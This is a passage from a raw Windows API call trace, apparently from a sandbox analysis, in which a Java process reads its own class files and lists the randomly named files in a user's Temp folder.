lpNewFilePointer=0x208b2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b2e0*=54316598) returned 1 [0112.193] ReadFile (in: hFile=0x134, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b2b0, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208b2b0*=0xa0, lpOverlapped=0x0) returned 1 [0112.193] malloc (_Size=0x35) returned 0x12ef3e10 [0112.194] strlen (_Str="sun/nio/fs/WindowsNativeDispatcher$VolumeInformation.class") returned 0x3a [0112.194] malloc (_Size=0x48) returned 0x12ef2980 [0112.194] malloc (_Size=0xa0) returned 0x12324330 [0112.194] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33cce98, lpNewFilePointer=0x208b2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b2e0*=54316696) returned 1 [0112.194] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b2b0, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208b2b0*=0xa0, lpOverlapped=0x0) returned 1 [0112.194] malloc (_Size=0x3b) returned 0x12ef29d0 [0112.196] strlen (_Str="sun/nio/fs/WindowsNativeDispatcher$DiskFreeSpace.class") returned 0x36 [0112.196] malloc (_Size=0x48) returned 0x12ef34c0 [0112.196] malloc (_Size=0xa0) returned 0x12324cd0 [0112.196] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ccd72, lpNewFilePointer=0x208b2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b2e0*=54316402) returned 1 [0112.196] ReadFile (in: hFile=0x134, lpBuffer=0x12324cd0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b2b0, lpOverlapped=0x0 | out: lpBuffer=0x12324cd0*, lpNumberOfBytesRead=0x208b2b0*=0xa0, lpOverlapped=0x0) returned 1 [0112.196] malloc (_Size=0x37) returned 0x12ef3e10 [0112.197] strlen (_Str="sun/nio/fs/WindowsNativeDispatcher$Account.class") returned 0x30 [0112.197] malloc (_Size=0x48) returned 0x12ef2980 [0112.198] malloc (_Size=0xa0) returned 0x12324330 [0112.198] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ccbe5, lpNewFilePointer=0x208b2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b2e0*=54316005) returned 1 [0112.198] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b2b0, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208b2b0*=0xa0, lpOverlapped=0x0) returned 1 [0112.198] malloc (_Size=0x31) returned 0x12ef4250 [0112.205] strlen (_Str="sun/nio/fs/WindowsNativeDispatcher$AclInformation.class") returned 0x37 [0112.206] malloc (_Size=0x48) returned 0x12ef34c0 [0112.206] malloc (_Size=0xa0) returned 0x12324330 [0112.206] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ccc43, lpNewFilePointer=0x208b2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b2e0*=54316099) returned 1 [0112.206] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b2b0, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208b2b0*=0xa0, lpOverlapped=0x0) returned 1 [0112.206] malloc (_Size=0x38) returned 0x12ef4410 [0112.207] strlen (_Str="sun/nio/fs/WindowsNativeDispatcher$CompletionStatus.class") returned 0x39 [0112.207] malloc (_Size=0x48) returned 0x12ef2980 [0112.207] malloc (_Size=0xa0) returned 0x12324330 [0112.207] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ccd0b, lpNewFilePointer=0x208b2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b2e0*=54316299) returned 1 [0112.207] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b2b0, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208b2b0*=0xa0, lpOverlapped=0x0) returned 1 [0112.207] malloc (_Size=0x3a) returned 0x12ef29d0 [0112.208] strlen (_Str="sun/nio/fs/WindowsNativeDispatcher$BackupResult.class") returned 0x35 [0112.209] malloc (_Size=0x48) returned 0x12ef34c0 [0112.209] malloc (_Size=0xa0) returned 0x12324330 [0112.209] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ccca8, lpNewFilePointer=0x208b2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b2e0*=54316200) returned 1 [0112.209] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b2b0, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208b2b0*=0xa0, lpOverlapped=0x0) returned 1 [0112.209] malloc (_Size=0x36) returned 0x12ef43d0 [0112.210] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x7ffb6097d8b0, phModule=0x208bd10 | out: phModule=0x208bd10*=0x7ffb60950000) returned 1 [0112.210] GetProcAddress (hModule=0x7ffb60950000, lpProcName="FindFirstStreamW") returned 0x7ffb5ef26c50 [0112.210] GetProcAddress (hModule=0x7ffb60950000, lpProcName="FindNextStreamW") returned 0x7ffb5ef270d0 [0112.210] GetProcAddress (hModule=0x7ffb60950000, lpProcName="CreateSymbolicLinkW") returned 0x7ffb60995b60 [0112.210] GetProcAddress (hModule=0x7ffb60950000, lpProcName="GetFinalPathNameByHandleW") returned 0x7ffb6097dae0 [0112.214] strlen (_Str="sun/nio/fs/NativeBuffers.class") returned 0x1e [0112.214] malloc (_Size=0x48) returned 0x12ef2980 [0112.214] malloc (_Size=0xa0) returned 0x12324330 [0112.214] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33cc0ee, lpNewFilePointer=0x208b260, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b260*=54313198) returned 1 [0112.214] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b230, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208b230*=0xa0, lpOverlapped=0x0) returned 1 [0112.214] malloc (_Size=0x1f) returned 0x12ef10b0 [0112.218] strlen (_Str="sun/nio/fs/NativeBuffer.class") returned 0x1d [0112.218] malloc (_Size=0x48) returned 0x12ef29d0 [0112.218] malloc (_Size=0xa0) returned 0x12324330 [0112.218] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33cc0a3, lpNewFilePointer=0x208b4c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4c0*=54313123) returned 1 [0112.218] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b490, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208b490*=0xa0, lpOverlapped=0x0) returned 1 [0112.218] malloc (_Size=0x1e) returned 0x12ef0960 [0112.220] strlen (_Str="sun/nio/fs/NativeBuffer$Deallocator.class") returned 0x29 [0112.220] malloc (_Size=0x48) returned 0x12ef34c0 [0112.220] malloc (_Size=0xa0) returned 0x12324330 [0112.220] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33cc04c, lpNewFilePointer=0x208b440, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b440*=54313036) returned 1 [0112.220] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b410, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208b410*=0xa0, lpOverlapped=0x0) returned 1 [0112.220] malloc (_Size=0x2a) returned 0x12ef4250 [0112.223] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\*", lpFindFileData=0x208c320 | out: lpFindFileData=0x208c320*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x1e547e58, ftLastAccessTime.dwHighDateTime=0x1d80c8a, ftLastWriteTime.dwLowDateTime=0x1e547e58, ftLastWriteTime.dwHighDateTime=0x1d80c8a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x425d20 [0112.223] wcslen (_String=".") returned 0x1 [0112.225] strlen (_Str="sun/nio/fs/WindowsFileAttributes.class") returned 0x26 [0112.225] malloc (_Size=0x48) returned 0x12ef2980 [0112.225] malloc (_Size=0xa0) returned 0x12324b70 [0112.225] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33cc6e2, lpNewFilePointer=0x208b350, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b350*=54314722) returned 1 [0112.225] ReadFile (in: hFile=0x134, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b320, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208b320*=0xa0, lpOverlapped=0x0) returned 1 [0112.225] malloc (_Size=0x27) returned 0x12ef0960 [0112.234] strlen (_Str="sun/nio/fs/WindowsDirectoryStream$WindowsDirectoryIterator.class") returned 0x40 [0112.235] malloc (_Size=0x48) returned 0x12ef2d40 [0112.235] malloc (_Size=0xa0) returned 0x12324330 [0112.235] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33cc4be, lpNewFilePointer=0x208b6d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b6d0*=54314174) returned 1 [0112.235] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b6a0, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208b6a0*=0xa0, lpOverlapped=0x0) returned 1 [0112.235] malloc (_Size=0x41) returned 0x12ef34c0 [0112.238] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x1e547e58, ftLastAccessTime.dwHighDateTime=0x1d80c8a, ftLastWriteTime.dwLowDateTime=0x1e547e58, ftLastWriteTime.dwHighDateTime=0x1d80c8a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="..", cAlternateFileName="")) returned 1 [0112.238] wcslen (_String="..") returned 0x2 [0112.239] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912285a0, ftCreationTime.dwHighDateTime=0x1d7e1e8, ftLastAccessTime.dwLowDateTime=0x37421f90, ftLastAccessTime.dwHighDateTime=0x1d7e43c, ftLastWriteTime.dwLowDateTime=0x37421f90, ftLastWriteTime.dwHighDateTime=0x1d7e43c, nFileSizeHigh=0x0, nFileSizeLow=0x4efa, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="-QCXPaT9t7WmEctQoXj.flv", cAlternateFileName="-QCXPA~1.FLV")) returned 1 [0112.239] wcslen (_String="-QCXPaT9t7WmEctQoXj.flv") returned 0x17 [0112.241] strlen (_Str="sun/nio/fs/WindowsPath$WindowsPathWithAttributes.class") returned 0x36 [0112.241] malloc (_Size=0x48) returned 0x12ef2980 [0112.241] malloc (_Size=0xa0) returned 0x12324b70 [0112.241] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ccfa2, lpNewFilePointer=0x208b560, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b560*=54316962) returned 1 [0112.242] ReadFile (in: hFile=0x134, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b530, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208b530*=0xa0, lpOverlapped=0x0) returned 1 [0112.242] malloc (_Size=0x37) returned 0x12ef3b50 [0112.247] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ea5f760, ftCreationTime.dwHighDateTime=0x1d7e6f3, ftLastAccessTime.dwLowDateTime=0x2c025ff0, ftLastAccessTime.dwHighDateTime=0x1d7e6f8, ftLastWriteTime.dwLowDateTime=0x2c025ff0, ftLastWriteTime.dwHighDateTime=0x1d7e6f8, nFileSizeHigh=0x0, nFileSizeLow=0x11fab, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="5sn JoEn-ds.gif", cAlternateFileName="5SNJOE~1.GIF")) returned 1 [0112.247] wcslen (_String="5sn JoEn-ds.gif") returned 0xf [0112.248] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5c07f20, ftCreationTime.dwHighDateTime=0x1d7d8e4, ftLastAccessTime.dwLowDateTime=0x7d7cba00, ftLastAccessTime.dwHighDateTime=0x1d7ddee, ftLastWriteTime.dwLowDateTime=0x7d7cba00, ftLastWriteTime.dwHighDateTime=0x1d7ddee, nFileSizeHigh=0x0, nFileSizeLow=0xf552, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="6QzvO9kX1KTnv.jpg", cAlternateFileName="6QZVO9~1.JPG")) returned 1 [0112.248] wcslen (_String="6QzvO9kX1KTnv.jpg") returned 0x11 [0112.249] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e260b70, ftCreationTime.dwHighDateTime=0x1d7e1bc, ftLastAccessTime.dwLowDateTime=0xcc495510, ftLastAccessTime.dwHighDateTime=0x1d7e2cd, ftLastWriteTime.dwLowDateTime=0xcc495510, ftLastWriteTime.dwHighDateTime=0x1d7e2cd, nFileSizeHigh=0x0, nFileSizeLow=0x34ba, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="AlU1G.mkv", cAlternateFileName="")) returned 1 [0112.249] wcslen (_String="AlU1G.mkv") returned 0x9 [0112.249] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a21bb80, ftCreationTime.dwHighDateTime=0x1d7e15f, ftLastAccessTime.dwLowDateTime=0x4702030, ftLastAccessTime.dwHighDateTime=0x1d7e38d, ftLastWriteTime.dwLowDateTime=0x4702030, ftLastWriteTime.dwHighDateTime=0x1d7e38d, nFileSizeHigh=0x0, nFileSizeLow=0x16c5e, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="aXzxFZxuftmS-4mPA5pr.mp3", cAlternateFileName="AXZXFZ~1.MP3")) returned 1 [0112.249] wcslen (_String="aXzxFZxuftmS-4mPA5pr.mp3") returned 0x18 [0112.250] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd669c780, ftCreationTime.dwHighDateTime=0x1d7e10d, ftLastAccessTime.dwLowDateTime=0x576ccb20, ftLastAccessTime.dwHighDateTime=0x1d7e6d1, ftLastWriteTime.dwLowDateTime=0x576ccb20, ftLastWriteTime.dwHighDateTime=0x1d7e6d1, nFileSizeHigh=0x0, nFileSizeLow=0xbbb, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="BAUCNppiLhGou.mp4", cAlternateFileName="BAUCNP~1.MP4")) returned 1 [0112.250] wcslen (_String="BAUCNppiLhGou.mp4") returned 0x11 [0112.252] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d24f3c0, ftCreationTime.dwHighDateTime=0x1d7dfb4, ftLastAccessTime.dwLowDateTime=0x56b05600, ftLastAccessTime.dwHighDateTime=0x1d7e3bd, ftLastWriteTime.dwLowDateTime=0x56b05600, ftLastWriteTime.dwHighDateTime=0x1d7e3bd, nFileSizeHigh=0x0, nFileSizeLow=0x54e1, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="DuDV7RSqHGq0uBRhdhh.m4a", cAlternateFileName="DUDV7R~1.M4A")) returned 1 [0112.252] wcslen (_String="DuDV7RSqHGq0uBRhdhh.m4a") returned 0x17 [0112.252] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4dd8f650, ftCreationTime.dwHighDateTime=0x1d7dab1, ftLastAccessTime.dwLowDateTime=0x82b136d0, ftLastAccessTime.dwHighDateTime=0x1d7e10f, ftLastWriteTime.dwLowDateTime=0x82b136d0, ftLastWriteTime.dwHighDateTime=0x1d7e10f, nFileSizeHigh=0x0, nFileSizeLow=0x11975, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="duogBQ.mp4", cAlternateFileName="")) returned 1 [0112.252] wcslen (_String="duogBQ.mp4") returned 0xa [0112.253] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bcb160, ftCreationTime.dwHighDateTime=0x1d7e304, ftLastAccessTime.dwLowDateTime=0x9d35ca30, ftLastAccessTime.dwHighDateTime=0x1d7e735, ftLastWriteTime.dwLowDateTime=0x9d35ca30, ftLastWriteTime.dwHighDateTime=0x1d7e735, nFileSizeHigh=0x0, nFileSizeLow=0x171e9, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="DxBTloDGkCs.csv", cAlternateFileName="DXBTLO~1.CSV")) returned 1 [0112.253] wcslen (_String="DxBTloDGkCs.csv") returned 0xf [0112.253] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1354010, ftCreationTime.dwHighDateTime=0x1d7e16e, ftLastAccessTime.dwLowDateTime=0xa7b674f0, ftLastAccessTime.dwHighDateTime=0x1d7e2cb, ftLastWriteTime.dwLowDateTime=0xa7b674f0, ftLastWriteTime.dwHighDateTime=0x1d7e2cb, nFileSizeHigh=0x0, nFileSizeLow=0xe917, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="fAhP_EIwc222KB3Nbl.flv", cAlternateFileName="FAHP_E~1.FLV")) returned 1 [0112.253] wcslen (_String="fAhP_EIwc222KB3Nbl.flv") returned 0x16 [0112.254] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5003680, ftCreationTime.dwHighDateTime=0x1d7d750, ftLastAccessTime.dwLowDateTime=0xad421580, ftLastAccessTime.dwHighDateTime=0x1d7e025, ftLastWriteTime.dwLowDateTime=0xad421580, ftLastWriteTime.dwHighDateTime=0x1d7e025, nFileSizeHigh=0x0, nFileSizeLow=0x50e6, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="g2jSFHT5NKnFaM3w3B.pptx", cAlternateFileName="G2JSFH~1.PPT")) returned 1 [0112.254] wcslen (_String="g2jSFHT5NKnFaM3w3B.pptx") returned 0x17 [0112.254] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51274798, ftCreationTime.dwHighDateTime=0x1d7e78c, ftLastAccessTime.dwLowDateTime=0x51274798, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x51274798, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="gen_py", cAlternateFileName="")) returned 1 [0112.255] wcslen (_String="gen_py") returned 0x6 [0112.255] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x846f1cf0, ftCreationTime.dwHighDateTime=0x1d7dcfd, ftLastAccessTime.dwLowDateTime=0x3d879e60, ftLastAccessTime.dwHighDateTime=0x1d7e253, ftLastWriteTime.dwLowDateTime=0x3d879e60, ftLastWriteTime.dwHighDateTime=0x1d7e253, nFileSizeHigh=0x0, nFileSizeLow=0x1540a, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="GfSxvVelF5XLnp-mufGE.mp3", cAlternateFileName="GFSXVV~1.MP3")) returned 1 [0112.255] wcslen (_String="GfSxvVelF5XLnp-mufGE.mp3") returned 0x18 [0112.255] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75a47df0, ftCreationTime.dwHighDateTime=0x1d7e6c1, ftLastAccessTime.dwLowDateTime=0x1cfb66f0, ftLastAccessTime.dwHighDateTime=0x1d7e6c6, ftLastWriteTime.dwLowDateTime=0x1cfb66f0, ftLastWriteTime.dwHighDateTime=0x1d7e6c6, nFileSizeHigh=0x0, nFileSizeLow=0x4d34, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="hpJ9cxAL3V.gif", cAlternateFileName="HPJ9CX~1.GIF")) returned 1 [0112.255] wcslen (_String="hpJ9cxAL3V.gif") returned 0xe [0112.261] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fa5e390, ftCreationTime.dwHighDateTime=0x1d7dd96, ftLastAccessTime.dwLowDateTime=0x5c573b60, ftLastAccessTime.dwHighDateTime=0x1d7e3b7, ftLastWriteTime.dwLowDateTime=0x5c573b60, ftLastWriteTime.dwHighDateTime=0x1d7e3b7, nFileSizeHigh=0x0, nFileSizeLow=0x18135, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="hpmiBsKcvxvDw14O.png", cAlternateFileName="HPMIBS~1.PNG")) returned 1 [0112.261] wcslen (_String="hpmiBsKcvxvDw14O.png") returned 0x14 [0112.261] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16d89637, ftCreationTime.dwHighDateTime=0x1d80c8a, ftLastAccessTime.dwLowDateTime=0x16d8d078, ftLastAccessTime.dwHighDateTime=0x1d80c8a, ftLastWriteTime.dwLowDateTime=0x16d8d078, ftLastWriteTime.dwHighDateTime=0x1d80c8a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="hsperfdata_RDhJ0CNFevzX", cAlternateFileName="HSPERF~1")) returned 1 [0112.261] wcslen (_String="hsperfdata_RDhJ0CNFevzX") returned 0x17 [0112.262] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d8ee3c0, ftCreationTime.dwHighDateTime=0x1d7e66b, ftLastAccessTime.dwLowDateTime=0x977b59e0, ftLastAccessTime.dwHighDateTime=0x1d7e698, ftLastWriteTime.dwLowDateTime=0x977b59e0, ftLastWriteTime.dwHighDateTime=0x1d7e698, nFileSizeHigh=0x0, nFileSizeLow=0x17fcd, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="HZ5RpN.gif", cAlternateFileName="")) returned 1 [0112.262] wcslen (_String="HZ5RpN.gif") returned 0xa [0112.262] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b4cd510, ftCreationTime.dwHighDateTime=0x1d7d997, ftLastAccessTime.dwLowDateTime=0x5a9b2d50, ftLastAccessTime.dwHighDateTime=0x1d7da10, ftLastWriteTime.dwLowDateTime=0x5a9b2d50, ftLastWriteTime.dwHighDateTime=0x1d7da10, nFileSizeHigh=0x0, nFileSizeLow=0xbbe0, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="ji5-N495TV-ncECC.png", cAlternateFileName="JI5-N4~1.PNG")) returned 1 [0112.262] wcslen (_String="ji5-N495TV-ncECC.png") returned 0x14 [0112.262] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0b8cec0, ftCreationTime.dwHighDateTime=0x1d7e196, ftLastAccessTime.dwLowDateTime=0xae713f60, ftLastAccessTime.dwHighDateTime=0x1d7e446, ftLastWriteTime.dwLowDateTime=0xae713f60, ftLastWriteTime.dwHighDateTime=0x1d7e446, nFileSizeHigh=0x0, nFileSizeLow=0x3f4d, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="K9Iiog1X 5KjNFLR5JW.rtf", cAlternateFileName="K9IIOG~1.RTF")) returned 1 [0112.263] wcslen (_String="K9Iiog1X 5KjNFLR5JW.rtf") returned 0x17 [0112.263] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58d6c2c4, ftCreationTime.dwHighDateTime=0x1d7e78c, ftLastAccessTime.dwLowDateTime=0x58d6c2c4, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x58d6c2c4, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="Kno921C.tmp", cAlternateFileName="")) returned 1 [0112.263] wcslen (_String="Kno921C.tmp") returned 0xb [0112.263] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x479c44e0, ftCreationTime.dwHighDateTime=0x1d7e510, ftLastAccessTime.dwLowDateTime=0x35a2d7a0, ftLastAccessTime.dwHighDateTime=0x1d7e622, ftLastWriteTime.dwLowDateTime=0x35a2d7a0, ftLastWriteTime.dwHighDateTime=0x1d7e622, nFileSizeHigh=0x0, nFileSizeLow=0x9553, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="kzsBwHL Ax.jpg", cAlternateFileName="KZSBWH~1.JPG")) returned 1 [0112.264] wcslen (_String="kzsBwHL Ax.jpg") returned 0xe [0112.264] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x52b5b1a1, ftCreationTime.dwHighDateTime=0x1d7e78c, ftLastAccessTime.dwLowDateTime=0x52b5b1a1, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x52b5b1a1, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="Low", cAlternateFileName="")) returned 1 [0112.264] wcslen (_String="Low") returned 0x3 [0112.264] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d760320, ftCreationTime.dwHighDateTime=0x1d7e5df, ftLastAccessTime.dwLowDateTime=0x996ed1d0, ftLastAccessTime.dwHighDateTime=0x1d7e65e, ftLastWriteTime.dwLowDateTime=0x996ed1d0, ftLastWriteTime.dwHighDateTime=0x1d7e65e, nFileSizeHigh=0x0, nFileSizeLow=0x161cf, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="lRiajfsZl4xnmu.avi", cAlternateFileName="LRIAJF~1.AVI")) returned 1 [0112.264] wcslen (_String="lRiajfsZl4xnmu.avi") returned 0x12 [0112.265] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca1fb9a0, ftCreationTime.dwHighDateTime=0x1d7e1a1, ftLastAccessTime.dwLowDateTime=0x7bf43920, ftLastAccessTime.dwHighDateTime=0x1d7e26b, ftLastWriteTime.dwLowDateTime=0x7bf43920, ftLastWriteTime.dwHighDateTime=0x1d7e26b, nFileSizeHigh=0x0, nFileSizeLow=0xd339, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="lYAWs X.gif", cAlternateFileName="LYAWSX~1.GIF")) returned 1 [0112.265] wcslen (_String="lYAWs X.gif") returned 0xb [0112.265] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfee8e9d0, ftCreationTime.dwHighDateTime=0x1d7d7f7, ftLastAccessTime.dwLowDateTime=0x4d4cf6b0, ftLastAccessTime.dwHighDateTime=0x1d7da74, 